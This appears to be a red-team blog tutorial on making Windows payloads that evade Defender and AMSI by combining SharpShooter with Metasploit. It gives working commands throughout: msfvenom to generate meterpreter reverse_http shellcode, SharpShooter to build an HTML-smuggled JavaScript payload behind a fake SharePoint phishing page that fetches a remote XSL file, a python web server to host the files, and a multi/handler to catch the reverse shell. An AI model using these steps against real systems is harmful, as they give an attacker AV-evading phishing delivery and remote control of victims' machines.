Clientside Exploitation - Tricks of the Trade 0x01 - Sharpshooter + SquibblyTwo
Hi! I hope you’re well, today I am going to show you something that is common knowledge in the red teaming community, people use this kind of thing every day without thinking about it. However, if you’re new to security, or you’re just not involved in the industry, a lot of these techniques and appear a bit daunting and long-winded. I’m here to show that it really isn’t hard, and you don’t need Cobalt Strike to do it, despite how awesome it is.
Here is a demo of it running with Cobalt Strike.
Today I am going to show you how to:
- Create a payload that isn’t detected by Windows Defender, even with real-time protection, advanced threat protection, and AMSI
- Do all of this without Cobalt Strike, and instead with Sharpshooter + Metasploit/Msfvenom*
*If you have a problem with metasploit framework, I understand. It is usually associated with people who just fire exploits at random hosts in a hope to get shells. However, I do not think that we should discard a very useful tool because of its sad minority of users. Metasploit is a great tool when used correctly, can provide tremendous value, and it’s free!
Author Assigned Level: Wannabe
Community Assigned Level:
- Understanding of payload generation with metasploit
- Understanding of metasploit payloads
- Basic networking understanding
In no way to do I claim this to be my work, this is purely my take on this method, and if you want to read the original source of this information, please read it from here. This is an excellent method developed by Dominic Chell from Mdsec, and I wanted to re-write this in a way I think is more concise and holistic. As a side note, some images and videos may be sourced from that article.
One of the reasons I chose to do a write-up on this, especially when very good articles have already been written by mdsec, such as Payload Generation with Sharpshooter and Freestyling with Sharpshooter, is because I feel there are certain things that are assumed that you know how to use; things such as
--rawscfile payload generation.
In this article, I will assume previous metasploit + msfvenom experience, the concept of xsl’s (how to do it manually), and experience using the CLI in Linux.
This is a really easy way to generate undetectable payloads, and I am here to show you just how easy it is. If you’re already quite proficient, just scan down and read the code, I’m sure most of you are just skim reading this article anyway
Something to keep in mind:
- You can only use Python 2 with Sharpshooter. It will run with Python 3, but it’ll break stuff. Don’t ask me. It only caused me about 10 hours of trouble. (not quite, but you get the idea)
- Cloned Repo + Setup of Sharpshooter
- Cloned Repo/Install of metasploit framework (Use rvm and install deps with bundler)
Generating your shellcode
You’ll need msfvenom for this task, in other examples of how to use sharpshooter, you’ll use things like csharp byte-arrays. For this example, we’ll be using straight up shellcode. Lucky for us, msfvenom actually will do this for us in one command.
Run the following:
./msfvenom -a x64 -p windows/x64/meterpreter/reverse_http LHOST=192.168.1.221 LPORT=443 EnableStageEncoding=True PrependMigrate=True -f raw -o shellcode.txt
If you’ve used msfvenom before, you’ll know that this is just generating a payload for the x64 architecture (64bit), using the meterpreter reverse_http payload. The reverse_http payload option helps us to remain more stealthy, and slide past low-complexity packet inspection firewalls. For example, some firewalls allow you to allow “http” traffic. This will slide past that.
Generating your Payload
Now you’ve generated your shellcode, place the shellcode.txt file inside the same directory. Now if you’re using a distro such as Arch Linux, “Python” will be Python3 by default. Whereas on Ubuntu + Kali, it will be Python2 by default. You can easily verify which is true for you by running
Now run the following, with the correct python executable, for me, this was
python2 SharpShooter.py --stageless --dotnetver 2 --payload js --output foo --rawscfile raw3.txt --smuggle --template sharepoint --com xslremote --awlurl http://192.168.1.221:8000/foo.xsl
This will do multiple things. Firstly it will create a stageless payload, this means that it will not be staged, and therefore will have everything it needs inside the payload. This can be a bit misleading, as it will later pull a
.xsl file, however as far as you need to know, this is a stageless payload.
Secondly, it will specify dotnet version 2 to use, you need to ensure that the target has this version of dotnet installed, if they do not, then this will fail. Most Windows targets have at least dotnet version 2, so this is usually fine.
Next we specify which payload type to use, in this case, I specify JS, however, we could easily also specify something such as
After that, we use the --smuggle function. Some firewalls and security software blocks downloads of
.vba files, this --smuggle function wraps the file up inside the html file, encodes and encrypts it. On page load, the data is decrypted and decoded and saved as a blob. No more do spam filters that block malicious extensions work. (I love this feature). In the same breath, we specify a template, all this will do is make the page look more legitimate, in this case, we specify
SharePoint as the template, this means that the phishing HTML will look like it is downloading from Microsoft Sharepoint.
Now we get to the exciting bit, com-staging. Com-staging is a term coined by Dom Chell from Mdsec, to break it down, some Microsoft applications such as Outlook, have functions that allow you to run shell commands, such as
obj.CreateObject("Wscript.shell").run("fun commands"). This is leveraged by sharpshooter, and this in case, it is leveraging WMI to execute code from an XSL file.
Next, we need to specify our --awlurl, this will be where the xsl file will be located. In my case, I have specified at my
http://myip:8000/file.xsl, because it is by default placed into the
output folder, and I am going to run a python http server in there.
Serving up our Malicious files…
cd into the
./output directory, and run:
python3 -m http.server
This will create a basic python web server on port 8000, inside this directory.
Now, in another window, start your Metasploit handler.
sudo -E ./msfconsole use exploit/multi/handler set LHOST 192.168.1.221 set LPORT 443 set PAYLOAD windows/x64/meterpreter/reverse_http set ExitOnSession false exploit -j
Now you should have a reverse_http handler started. Simply ensure that ports 8000 and ports 443 are open. And now navigate to
http://yourip:8000/foo.html. You should be able to open the files, and should receive a shell!
Sharpshooter + SquibblyTwo with Com-staging is working an absolute treat to bypass AMSI, for now. Let’s see how long this lasts, for now though, we should abuse the hell out of this in red team assessments + advanced pentests. In future articles, I may begin to examine MacOS security and more… Stay tuned!